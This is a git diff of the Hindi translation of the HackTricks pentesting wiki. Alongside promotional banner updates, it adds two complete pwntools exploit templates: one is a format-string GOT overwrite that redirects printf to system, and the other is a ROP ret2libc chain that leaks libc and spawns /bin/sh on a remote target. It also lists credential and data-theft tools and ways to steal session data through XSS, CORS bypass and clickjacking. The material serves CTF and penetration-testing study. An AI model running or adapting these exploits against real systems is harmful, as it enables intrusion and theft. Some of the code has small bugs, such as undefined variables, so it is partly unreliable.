+* **हैकिंग ट्रिक्स साझा करें एक PR जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %}
+
+
+## **स्थानीय लूट**
+
+* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): ये स्क्रिप्ट, PE वेक्टर्स की खोज के अलावा, फाइल सिस्टम के अंदर संवेदनशील जानकारी की खोज करेंगे।
+* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne प्रोजेक्ट** एक ओपन सोर्स एप्लिकेशन है जिसका उपयोग स्थानीय कंप्यूटर पर स्टोर की गई कई पासवर्ड्स को पुनः प्राप्त करने के लिए किया जाता है। प्रत्येक सॉफ्टवेयर अलग-अलग तकनीकों (सादा पाठ, एपीआई, कस्टम एल्गोरिदम्स, डेटाबेस आदि) का उपयोग करके अपने पासवर्ड्स को स्टोर करता है। इस टूल का विकास इन पासवर्ड्स को खोजने के उद्देश्य से किया गया है जो सबसे अधिक प्रयोग किए जाने वाले सॉफ्टवेयर के लिए।
+
+## **बाह्य सेवाएं**
+
+* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): यह मॉड्यूल Confluence की एपीआई से कनेक्ट होगा, पीडीएफ में निर्यात करेगा, और उन Confluence दस्तावेज़ों को डाउनलोड करेगा जिनका लक्ष्य है कि लक्ष्य का पहुंच है।
+* [**GD-Thief**](https://github.com/antman1p/GD-Thief): रेड टीम टूल एक लक्ष्य के Google Drive से फ़ाइलों को बाहर निकालने के लिए जिसका आपका पहुंच है, Google Drive एपीआई के माध्यम से। इसमें सभी साझा फ़ाइलें, साझा ड्राइव से सभी फ़ाइलें, और डोमेन ड्राइव से सभी फ़ाइलें शामिल हैं जिनका लक्ष्य पहुंच है।
+* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): रेड टीम टूल जिसका उपयोग Google के लोगों की डायरेक्टरी को बाहर निकालने के लिए किया जाता है, जिसका आपका पहुंच है, Google के लोगों की एपीआई के माध्यम से।
+* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** यह एक टूल है जो पायथन में विकसित किया गया है जो एक एक्सेस टोकन देता है और एक स्लैक वर्कस्पेस से 'दिलचस्प' जानकारी निकालने के लिए नेटिव स्लैक एपीआई का उपयोग करता है।
+* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound एक कमांड लाइन टूल है जो रेड और ब्लू टीमों को एक स्लैक वर्कस्पेस/संगठन की जांच तेजी से करने के लिए है। Slackhound संगठन के उपयोगकर्ताओं, फ़ाइलों, संदेशों आदि का संग्रहण तेजी से खोजने में मदद करता है और बड़े ऑब्जेक्ट्स को ऑफलाइन समीक्षा के लिए सीएसवी में लिखा जाता है।
diff --git a/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md b/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md
index aca31bf0d..80f4fc644 100644
--- a/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md
+++ b/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md
@@ -1,2 +1,166 @@
-# Format Strings Template
+{% hint style="success" %}
+सीखें और प्रैक्टिस करें AWS हैकिंग: [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+हैकट्रिक्स का समर्थन करें
+
+* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
+* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
+* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+
+
+{% endhint %}
+```python
+from pwn import *
+from time import sleep
+
+###################
+### CONNECTION ####
+###################
+
+# Define how you want to exploit the binary
+LOCAL = True
+REMOTETTCP = False
+REMOTESSH = False
+GDB = False
+
+# Configure vulnerable binary
+LOCAL_BIN = "./tyler"
+REMOTE_BIN = "./tyler" #For ssh
+
+# In order to exploit the format string you may need to append/prepend some string to the payload
+# configure them here
+PREFIX_PAYLOAD = b""
+SUFFIX_PAYLOAD = b""
+NNUM_ALREADY_WRITTEN_BYTES = 0
+MAX_LENTGH = 999999 #Big num if not restricted
+
+print(" ====================== ")
+print("Selected options:")
+print(f"PREFIX_PAYLOAD: {PREFIX_PAYLOAD}")
+print(f"SUFFIX_PAYLOAD: {SUFFIX_PAYLOAD}")
+print(f"NNUM_ALREADY_WRITTEN_BYTES: {NNUM_ALREADY_WRITTEN_BYTES}")
+print(" ====================== ")
+
+
+def connect_binary():
+global P, ELF_LOADED, ROP_LOADED
+
+if LOCAL:
+P = process(LOCAL_BIN) # start the vuln binary
+ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
+ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
+
+elif REMOTETTCP:
+P = remote('10.10.10.10',1338) # start the vuln binary
+ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
+ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
+
+elif REMOTESSH:
+ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
+P = ssh_shell.process(REMOTE_BIN) # start the vuln binary
+ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
+ROP_LOADED = ROP(elf)# Find ROP gadgets
+
+
+#######################################
+### Get format string configuration ###
+#######################################
+
+def send_payload(payload):
+payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
+log.info("payload = %s" % repr(payload))
+if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED")
+P.sendline(payload)
+sleep(0.5)
+return P.recv()
+
+
+def get_formatstring_config():
+global P
+
+for offset in range(1,1000):
+connect_binary()
+P.clean()
+
+payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p"
+recieved = send_payload(payload).strip()
+
+if b"41" in recieved:
+for padlen in range(0,4):
+if b"41414141" in recieved:
+connect_binary()
+payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p"
+recieved = send_payload(payload).strip()
+print(recieved)
+if b"42424242" in recieved:
+log.info(f"Found offset ({offset}) and padlen ({padlen})")
+return offset, padlen
+
+else:
+connect_binary()
+payload = b" " + payload
+recieved = send_payload(payload).strip()
+
+
+# In order to exploit a format string you need to find a position where part of your payload
+# is being reflected. Then, you will be able to put in the position arbitrary addresses
+# and write arbitrary content in those addresses
+# Therefore, the function get_formatstring_config will find the offset and padd needed to exploit the format string
+
+offset, padlen = get_formatstring_config()
+
+
+# In this template, the GOT of printf (the part of the GOT table that points to where the printf
+# function resides) is going to be modified by the address of the system inside the PLT (the
+# part of the code that will jump to the system function).
+# Therefore, next time the printf function is executed, system will be executed instead with the same
+# parameters passed to printf
+
+# In some scenarios you will need to loop1 more time to the vulnerability
+# In that cases you need to overwrite a pointer in the .fini_array for example
+# Uncomment the commented code below to gain 1 rexecution extra
+
+#P_FINI_ARRAY = ELF_LOADED.symbols["__init_array_end"] # .fini_array address
+#INIT_LOOP_ADDR = 0x8048614 # Address to go back
+SYSTEM_PLT = ELF_LOADED.plt["system"]
+P_GOT = ELF_LOADED.got["printf"]
+
+#log.info(f"Init loop address: {hex(INIT_LOOP_ADDR)}")
+#log.info(f"fini.array address: {hex(P_FINI_ARRAY)}")
+log.info(f"System PLT address: {hex(SYSTEM_PLT)}")
+log.info(f"Printf GOT address: {hex(P_GOT)}")
+
+connect_binary()
+if GDB and not REMOTETTCP and not REMOTESSH:
+# attach gdb and continue
+# You can set breakpoints, for example "break *main"
+gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n"
+sleep(5)
+
+format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen, numbwritten=NNUM_ALREADY_WRITTEN_BYTES)
+#format_string.write(P_FINI_ARRAY, INIT_LOOP_ADDR)
+format_string.write(P_GOT, SYSTEM_PLT)
+format_string.execute_writes()
+
+# Now that printf function is executing system you just need to find a place where you can
+# control the parameters passed to printf to execute arbitrary code.
+
+P.interactive()
+```
+{% hint style="success" %}
+सीखें और प्रैक्टिस करें AWS हैकिंग: [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+हैकट्रिक्स का समर्थन करें
+
+* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
+* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
+* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+
+
+{% endhint %}
diff --git a/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md b/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
new file mode 100644
index 000000000..0db5950db
--- /dev/null
+++ b/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
@@ -0,0 +1,242 @@
+{% hint style="success" %}
+सीखें और प्रैक्टिस करें AWS हैकिंग: [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+हैकट्रिक्स का समर्थन करें
+
+* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
+* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें ट्विटर पर फॉलो करें 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
+
+
+{% endhint %}
+
+
+{% code title="template.py" %}
+```python
+from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools
+
+
+###################
+### CONNECTION ####
+###################
+LOCAL = False
+REMOTETTCP = True
+REMOTESSH = False
+GDB = False
+USE_ONE_GADGET = False
+
+LOCAL_BIN = "./vuln"
+REMOTE_BIN = "~/vuln" #For ssh
+LIBC = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it
+ENV = {"LD_PRELOAD": LIBC} if LIBC else {}
+
+if LOCAL:
+P = process(LOCAL_BIN, env=ENV) # start the vuln binary
+ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
+ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
+
+elif REMOTETTCP:
+P = remote('10.10.10.10',1339) # start the vuln binary
+ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
+ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
+
+elif REMOTESSH:
+ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
+p = ssh_shell.process(REMOTE_BIN) # start the vuln binary
+elf = ELF(LOCAL_BIN)# Extract data from binary
+rop = ROP(elf)# Find ROP gadgets
+
+if GDB and not REMOTETTCP and not REMOTESSH:
+# attach gdb and continue
+# You can set breakpoints, for example "break *main"
+gdb.attach(P.pid, "b *main")
+
+
+
+#########################
+#### OFFSET FINDER ######
+#########################
+
+OFFSET = b"" #b"A"*264
+if OFFSET == b"":
+gdb.attach(P.pid, "c") #Attach and continue
+payload = cyclic(264)
+payload += b"AAAAAAAA"
+print(P.clean())
+P.sendline(payload)
+#x/wx $rsp -- Search for bytes that crashed the application
+#print(cyclic_find(0x63616171)) # Find the offset of those bytes
+P.interactive()
+exit()
+
+
+
+####################
+### Find Gadgets ###
+####################
+try:
+libc_func = "puts"
+PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
+except:
+libc_func = "printf"
+PUTS_PLT = ELF_LOADED.plt['printf']
+
+MAIN_PLT = ELF_LOADED.symbols['main']
+POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"
+RET = (ROP_LOADED.find_gadget(['ret']))[0]
+
+log.info("Main start: " + hex(MAIN_PLT))
+log.info("Puts plt: " + hex(PUTS_PLT))
+log.info("pop rdi; ret gadget: " + hex(POP_RDI))
+log.info("ret gadget: " + hex(RET))
+
+
+########################
+### Find LIBC offset ###
+########################
+
+def generate_payload_aligned(rop):
+payload1 = OFFSET + rop
+if (len(payload1) % 16) == 0:
+return payload1
+
+else:
+payload2 = OFFSET + p64(RET) + rop
+if (len(payload2) % 16) == 0:
+log.info("Payload aligned successfully")
+return payload2
+else:
+log.warning(f"I couldn't align the payload! Len: {len(payload1)}")
+return payload1
+
+
+def get_addr(libc_func):
+FUNC_GOT = ELF_LOADED.got[libc_func]
+log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
+# Create rop chain
+rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
+rop1 = generate_payload_aligned(rop1)
+
+# Send our rop-chain payload
+#P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received
+print(P.clean()) # clean socket buffer (read all and print)
+P.sendline(rop1)
+
+# If binary is echoing back the payload, remove that message
+recieved = P.recvline().strip()
+if OFFSET[:30] in recieved:
+recieved = P.recvline().strip()
+
+# Parse leaked address
+log.info(f"Len rop1: {len(rop1)}")
+leak = u64(recieved.ljust(8, b"\x00"))
+log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}")
+
+# Set lib base address
+if LIBC:
+LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
+print("If LIBC base doesn't end end 00, you might be using an icorrect libc library")
+log.info("LIBC base @ %s" % hex(LIBC.address))
+
+# If not LIBC yet, stop here
+else:
+print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)")
+P.interactive()
+
+return hex(leak)
+
+get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
+
+
+
+#############################
+#### FINAL EXPLOITATION #####
+#############################
+
+## Via One_gadget (https://github.com/david942j/one_gadget)
+# gem install one_gadget
+def get_one_gadgets(libc):
+import string, subprocess
+args = ["one_gadget", "-r"]
+if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()):
+args += ["-b", libc.hex()]
+else:
+args += [libc]
+try:
+one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()]
+except:
+print("One_gadget isn't installed")
+one_gadgets = []
+return
+
+rop2 = b""
+if USE_ONE_GADGET:
+one_gadgets = get_one_gadgets(LIBC)
+if one_gadgets:
+rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains
+
+## Normal/Long exploitation
+if not rop2:
+BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
+SYSTEM = LIBC.sym["system"]
+EXIT = LIBC.sym["exit"]
+
+log.info("POP_RDI %s " % hex(POP_RDI))
+log.info("bin/sh %s " % hex(BINSH))
+log.info("system %s " % hex(SYSTEM))
+log.info("exit %s " % hex(EXIT))
+
+rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT)
+rop2 = generate_payload_aligned(rop2)
+
+
+print(P.clean())
+P.sendline(rop2)
+
+P.interactive() #Interact with your shell :)
+```
+{% endcode %}
+
+# सामान्य समस्याएँ
+
+## MAIN_PLT = elf.symbols\['main'] नहीं मिला
+
+यदि "main" प्रतीक मौजूद नहीं है (संभावित रूप से इसलिए कि यह एक स्ट्रिप्ड बाइनरी है)। तो आप बस यहाँ मुख्य कोड कहाँ है देख सकते हैं:
+```python
+objdump -d vuln_binary | grep "\.text"
+Disassembly of section .text:
+0000000000401080 <.text>:
+```
+और पता मैन्युअल रूप से सेट करें:
+```python
+MAIN_PLT = 0x401080
+```
+## Puts नहीं मिला
+
+यदि बाइनरी Puts का उपयोग नहीं कर रहा है तो आपको यह जांचनी चाहिए कि क्या यह इस्तेमाल कर रहा है
+
+## `sh: 1: %s%s%s%s%s%s%s%s: not found`
+
+यदि आप इस **त्रुटि** को पाते हैं जब आप **सभी** एक्सप्लॉइट बनाने के बाद: `sh: 1: %s%s%s%s%s%s%s%s: not found`
+
+तो कोशिश करें कि **"/bin/sh" के पते को 64 बाइट कम करें**:
+```python
+BINSH = next(libc.search("/bin/sh")) - 64
+```
+{% hint style="success" %}
+**एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+**जीसीपी हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+हैकट्रिक्स का समर्थन करें
+
+* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
+* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
+* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
+
+
+{% endhint %}
diff --git a/stealing-sensitive-information-disclosure-from-a-web.md b/stealing-sensitive-information-disclosure-from-a-web.md
index c3bd7a871..04ade1b28 100644
--- a/stealing-sensitive-information-disclosure-from-a-web.md
+++ b/stealing-sensitive-information-disclosure-from-a-web.md
@@ -1,37 +1,39 @@
-# वेब से संवेदनशील जानकारी की चोरी
+# वेब से संवेदनशील जानकारी फासवन
+
+{% hint style="success" %}
+AWS हैकिंग सीखें और अभ्यास करें:[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCP हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert)!
+हैकट्रिक्स का समर्थन करें
-HackTricks का समर्थन करने के अन्य तरीके:
-
-* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
-* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
-* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
+* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
+* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
+* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
+{% endhint %}
-यदि कभी आपको एक **वेब पेज मिलता है जो आपके सत्र के आधार पर आपको संवेदनशील जानकारी प्रस्तुत करता है**: शायद यह कुकीज़ को प्रतिबिंबित कर रहा है, या प्रिंटिंग या CC विवरण या कोई अन्य संवेदनशील जानकारी, आप इसे चुराने का प्रयास कर सकते हैं।\
-यहाँ मैं आपको मुख्य तरीके प्रस्तुत करता हूँ जिनसे आप इसे हासिल करने का प्रयास कर सकते हैं:
+यदि किसी समय आपको एक **वेब पृष्ठ मिलता है जो आपकी सत्र पर आधारित संवेदनशील जानकारी प्रस्तुत करता है**: शायद यह कुकीज को प्रतिबिंबित कर रहा है, या डिटेल्स या किसी अन्य संवेदनशील जानकारी को प्रिंट कर रहा है, तो आप इसे चुरा सकते हैं।\
+यहाँ मैं आपको इसे प्राप्त करने की प्रमुख तरीके प्रस्तुत करता हूँ:
-* [**CORS bypass**](pentesting-web/cors-bypass.md): यदि आप CORS हेडर्स को बायपास कर सकते हैं तो आप एक दुर्भावनापूर्ण पेज के लिए Ajax अनुरोध करके जानकारी चुरा सकते हैं।
-* [**XSS**](pentesting-web/xss-cross-site-scripting/): यदि आप पेज पर XSS भेद्यता पाते हैं तो आप इसका दुरुपयोग करके जानकारी चुरा सकते हैं।
-* [**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection/): यदि आप XSS टैग्स इंजेक्ट नहीं कर सकते हैं तो आप अन्य नियमित HTML टैग्स का उपयोग करके जानकारी चुरा सकते हैं।
-* [**Clickjaking**](pentesting-web/clickjacking.md): यदि इस हमले के खिलाफ कोई सुरक्षा नहीं है, तो आप उपयोगकर्ता को धोखा देकर संवेदनशील डेटा आपको भेजने के लिए मजबूर कर सकते हैं (एक उदाहरण [यहाँ](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20))।
+* [**CORS बाईपास**](pentesting-web/cors-bypass.md): यदि आप CORS हेडर्स को बाईपास कर सकते हैं तो आप एक दुरुपयोगी पृष्ठ के लिए एजेक्स अनुरोध करके जानकारी चुरा सकते हैं।
+* [**XSS**](pentesting-web/xss-cross-site-scripting/): यदि आप पृष्ठ पर XSS दोष पाते हैं तो आप इसका दुरुपयोग करके जानकारी चुरा सकते हैं।
+* [**डैंगलिंग मार्कअप**](pentesting-web/dangling-markup-html-scriptless-injection/): यदि आप XSS टैग नहीं इंजेक्ट कर सकते हैं तो आप अन्य साधारण HTML टैग का उपयोग करके जानकारी चुरा सकते हैं।
+* [**क्लिकजैकिंग**](pentesting-web/clickjacking.md): यदि इस हमले के खिलाफ कोई सुरक्षा नहीं है, तो आप उपयोगकर्ता को धोखा देकर संवेदनशील डेटा भेजने में सक्षम हो सकते हैं (एक उदाहरण [यहाँ](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20))।
+
+{% hint style="success" %}
+AWS हैकिंग सीखें और अभ्यास करें:[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCP हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert)!
+हैकट्रिक्स का समर्थन करें
-HackTricks का समर्थन करने के अन्य तरीके:
-
-* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
-* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
-* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
+* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
+* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
+* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
+{% endhint %}
diff --git a/todo/6881-udp-pentesting-bittorrent.md b/todo/6881-udp-pentesting-bittorrent.md
index c91f19b61..bca1dfc15 100644
--- a/todo/6881-udp-pentesting-bittorrent.md
+++ b/todo/6881-udp-pentesting-bittorrent.md
@@ -1,13 +1,14 @@
+{% hint style="success" %}
+**एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:**[**हैकट्रिक्स प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (एआरटीई)**](https://training.hacktricks.xyz/courses/arte)\
+**जीसीपी हैकिंग सीखें और अभ्यास करें:** [**हैकट्रिक्स प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (जीआरटीई)**](https://training.hacktricks.xyz/courses/grte)
+
-AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
+हैकट्रिक्स का समर्थन करें
-HackTricks का समर्थन करने के अन्य तरीके:
-
-* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
-* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
-* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स **शेयर करें**.
+* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
+* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो करें**.
+* [**हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके हैकिंग ट्रिक्स साझा करें।
+{% endhint %}
diff --git a/todo/burp-suite.md b/todo/burp-suite.md
index 4b98ff942..950a84dfc 100644
--- a/todo/burp-suite.md
+++ b/todo/burp-suite.md
@@ -1,43 +1,29 @@
+{% hint style="success" %}
+सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-AWS हैकिंग सीखें शून्य से नायक तक htARTE (HackTricks AWS Red Team Expert) के साथ!
+हैकट्रिक्स का समर्थन करें
-HackTricks का समर्थन करने के अन्य तरीके:
-
-* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
